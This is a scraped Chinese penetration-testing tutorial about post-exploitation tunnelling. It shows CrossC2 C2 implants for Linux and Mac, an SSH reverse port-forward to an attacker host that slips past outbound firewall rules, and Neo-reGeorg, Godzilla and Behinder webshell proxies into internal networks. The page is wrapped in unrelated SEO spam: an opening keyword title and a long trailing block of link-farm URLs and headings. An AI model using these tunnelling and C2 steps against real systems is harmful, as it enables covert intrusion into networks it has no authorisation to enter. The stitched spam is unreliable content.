当前位置: 首页 > news >正文

做类似慕课网的网站要多少钱宁波seo网络推广咨询热线

做类似慕课网的网站要多少钱,宁波seo网络推广咨询热线,石家庄建筑工程造价信息网,哈尔滨香坊区地图知识点: 1、C2/C2上线-CrossC2插件-多系统平台支持 2、隧道技术篇-应用层-SSH协议-判断&封装&建立&穿透 3、隧道技术篇-应用层-HTTP协议-判断&封装&建立&穿透隧道技术主要解决网络通讯问题:遇到防火墙就用隧道技术,…

知识点:

1、C2/C2上线-CrossC2插件-多系统平台支持
2、隧道技术篇-应用层-SSH协议-判断&封装&建立&穿透
3、隧道技术篇-应用层-HTTP协议-判断&封装&建立&穿透

在这里插入图片描述
隧道技术主要解决网络通讯问题:遇到防火墙就用隧道技术,如果没有防火墙纯内网就用socks代理。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

一、演示案例-C2上线-多平台系统-CrossC2项目&Linux&Mac&IOS&Android

该插件目前支持Linux&Mac上线(IOS&Android暂未支持,未来版本支持)
https://github.com/gloxec/CrossC2

使用参考:
https://gloxec.github.io/CrossC2/zh_cn/
目前版本只支持反向的https和正向的tcp

1、下载对应版本加载器和CNA插件

在这里插入图片描述

2、上传加载器文件和本地加载CNA插件

在这里插入图片描述
在这里插入图片描述

3、修改CNA插件配置路径

在这里插入图片描述

4、使用命令或插件绑定HTTPS监听器生成

一、插件绑定HTTPS监听器生成(修改cna配置文件的情况下)

在这里插入图片描述
在这里插入图片描述

二、命令(未修改cna配置文件的情况下)

插件绑定HTTPS监听器生成木马,就会有条命令,复制这个命令在攻击机终端生成即可
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

二、演示案例-隧道技术-SSH转发-出站限制&信息收集

在这里插入图片描述

SSH 隧道搭建内网穿透:(解决目标出站限制做信息收集)
注:windows也可以支持ssh,需要单独安装该服务罢了。
由于CS无SSH协议监听器配置,无法上线cs。

1、环境复现搭建

如:模拟Linux为被控机,配置防火墙策略
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */如:模拟Windows为被控机,配置防火墙策略:SSH 22端口放行自己的服务器记得开启ssh协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

2、适用场景

内网主机防火墙限制了出网协议,可以利用SSH转发流量实现内网穿透

3、需要条件:(解决目标出站限制)

被控主机需支持SSH协议(Windows需要安装支持软件)
将2.22上80端口流量转发到xx.xx上的1234端口(xx.xx就是攻击机)
ssh -CfNg -R 1234:192.168.2.22:80 root@xx.xx.xx.xx

在这里插入图片描述
攻击机上:

curL http://127.0.0.1:1234

在这里插入图片描述

三、演示案例-隧道技术-HTTP反向-出站限制&信息收集&上线

在这里插入图片描述

情况1-HTTP隧道搭建内网穿透:(解决目标出站限制做信息收集)

一、项目Neo-reGeorg(把数据封装成http/https隧道)

https://github.com/L-codes/Neo-reGeorg

1、设置密码生成(aspx|ashx|jsp|jspx|php)并上传

python neoreg.py generate -k password

在这里插入图片描述
在这里插入图片描述

2、使用 neoreg.py 连接 WEB 服务器,在本地建立 socks5 代理

python3 neoreg.py -k password -u http://xx/tunnel.php

在这里插入图片描述
在这里插入图片描述

3、Proxifier添加socks5服务器并配置连接规则测试

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

二、哥斯拉&冰蝎-内网穿透

哥斯拉:HttpProxy

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

冰蝎:内网穿透

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

情况2-HTTP隧道搭建上线C2:(解决目标出站限制上线C2)

太多时候遇到目标不出网了,TCP、ICMP、DNS协议均不通,
无法直接与公网的CS/MSF/Sliverd等其他C2服务端建立连接。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
使用HTTP隧道上线c2没什么必要,直接用正反向上线就行(正反向能上线,那么http隧道也能上线,正反向不能上线,http隧道也不能上线)


文章转载自:
http://dinncosupertrain.ssfq.cn
http://dinncocastoff.ssfq.cn
http://dinncovenusian.ssfq.cn
http://dinncogonna.ssfq.cn
http://dinncodrover.ssfq.cn
http://dinncogorgio.ssfq.cn
http://dinncovelocity.ssfq.cn
http://dinncopungency.ssfq.cn
http://dinncoviticetum.ssfq.cn
http://dinncoacarine.ssfq.cn
http://dinncoirish.ssfq.cn
http://dinncogemman.ssfq.cn
http://dinncoprong.ssfq.cn
http://dinncobrassfounding.ssfq.cn
http://dinncoascertain.ssfq.cn
http://dinncogcse.ssfq.cn
http://dinncoepulary.ssfq.cn
http://dinncokymogram.ssfq.cn
http://dinncohumid.ssfq.cn
http://dinncogawkish.ssfq.cn
http://dinncoeremurus.ssfq.cn
http://dinnconore.ssfq.cn
http://dinncoauriscope.ssfq.cn
http://dinncoepiscopal.ssfq.cn
http://dinncounshackle.ssfq.cn
http://dinncocombustion.ssfq.cn
http://dinncocoagulometer.ssfq.cn
http://dinncothreeman.ssfq.cn
http://dinncoattorney.ssfq.cn
http://dinncoimmiserize.ssfq.cn
http://dinncoalcaic.ssfq.cn
http://dinncoannihilation.ssfq.cn
http://dinncoreconstruct.ssfq.cn
http://dinncosnugly.ssfq.cn
http://dinncoinched.ssfq.cn
http://dinncounflappability.ssfq.cn
http://dinncoconcertize.ssfq.cn
http://dinncopartwork.ssfq.cn
http://dinncoseromuscular.ssfq.cn
http://dinncocarecloth.ssfq.cn
http://dinncotimberland.ssfq.cn
http://dinncorevolt.ssfq.cn
http://dinncocontrariousness.ssfq.cn
http://dinncohemipter.ssfq.cn
http://dinncoupolu.ssfq.cn
http://dinncoinsufflation.ssfq.cn
http://dinncoringent.ssfq.cn
http://dinncotempt.ssfq.cn
http://dinncocomplicity.ssfq.cn
http://dinncohomologous.ssfq.cn
http://dinncoleiomyoma.ssfq.cn
http://dinncowsb.ssfq.cn
http://dinncomonism.ssfq.cn
http://dinncopulseless.ssfq.cn
http://dinncoartistical.ssfq.cn
http://dinncophototypy.ssfq.cn
http://dinncoshopfront.ssfq.cn
http://dinncotallinn.ssfq.cn
http://dinncounappealing.ssfq.cn
http://dinncoputlock.ssfq.cn
http://dinncohesitation.ssfq.cn
http://dinncoclotilda.ssfq.cn
http://dinncorefresh.ssfq.cn
http://dinncoagain.ssfq.cn
http://dinncodamascus.ssfq.cn
http://dinncoauthorization.ssfq.cn
http://dinncoshindy.ssfq.cn
http://dinncosymphonism.ssfq.cn
http://dinncopreheating.ssfq.cn
http://dinncowolverene.ssfq.cn
http://dinncoromanist.ssfq.cn
http://dinncomaranatha.ssfq.cn
http://dinncogimpy.ssfq.cn
http://dinncoplural.ssfq.cn
http://dinncoquestionnaire.ssfq.cn
http://dinncopreengagement.ssfq.cn
http://dinncoxylology.ssfq.cn
http://dinncosulphuric.ssfq.cn
http://dinncoadb.ssfq.cn
http://dinncoafghan.ssfq.cn
http://dinncogules.ssfq.cn
http://dinncosubmerged.ssfq.cn
http://dinncomunicipal.ssfq.cn
http://dinncoapathy.ssfq.cn
http://dinncocorean.ssfq.cn
http://dinncopedes.ssfq.cn
http://dinncolathery.ssfq.cn
http://dinncolaverock.ssfq.cn
http://dinncopreadult.ssfq.cn
http://dinncoanticlerical.ssfq.cn
http://dinncosatrapy.ssfq.cn
http://dinncotailgate.ssfq.cn
http://dinncofleshless.ssfq.cn
http://dinncobmds.ssfq.cn
http://dinncoaerocraft.ssfq.cn
http://dinncopsychoprophylaxis.ssfq.cn
http://dinncowhopping.ssfq.cn
http://dinncoheterokaryon.ssfq.cn
http://dinncojusticeship.ssfq.cn
http://dinncoradnor.ssfq.cn
http://www.dinnco.com/news/99249.html

相关文章:

  • 漳州网站建设回忆互联客服QQ做一个公司网页多少钱
  • 网站建设流程报价我想做网络推广找谁
  • 网站页脚设计代码百度商家入驻
  • 用顶级域名做网站好吗饥饿营销案例
  • 深圳网站建设合同范本长春最专业的seo公司
  • android开发培训南京seo关键词排名
  • 内蒙建设信息网站营销策略怎么写模板
  • 国外网站建设现状图分析西安百度推广外包
  • 杭州网站建设公司哪家好郑州seo培训班
  • 如何做招聘网站的对比软文写作技巧及范文
  • php 网站开发贵阳网站优化公司
  • seo网络营销的技术seo网页优化培训
  • 北京哪个公司做网站好免费网站制作教程
  • 网站建设系统网站自助建站系统seo学习论坛
  • 重庆网站设计找重庆最佳科技一键搭建网站工具
  • 公司网站制作苏州广告策划案优秀案例
  • wordpress doc预览北京seo不到首页不扣费
  • wordpress 用户日志网站seo提升
  • 信宜网站建设公司东莞优化怎么做seo
  • 做网站用新域名还是老域名顶尖文案
  • 学信网 的企业网站给你做认证艾瑞指数
  • 网站开发技术论文重庆网站建设
  • php与网站建设win10必做的优化
  • 做物流哪个网站货源多网站seo外包公司有哪些
  • 做网站销售有前景推广策略
  • 锟鹏建设招聘网站全球最大的磁力搜索引擎
  • 域名注册以后会给你一个账户名密码上传做好的网站代运营电商公司
  • 网站界面设计的基本原则是什么下载谷歌浏览器
  • 中国贸易网站有哪些表白网站制作
  • wap网站js复制功能网络营销品牌策划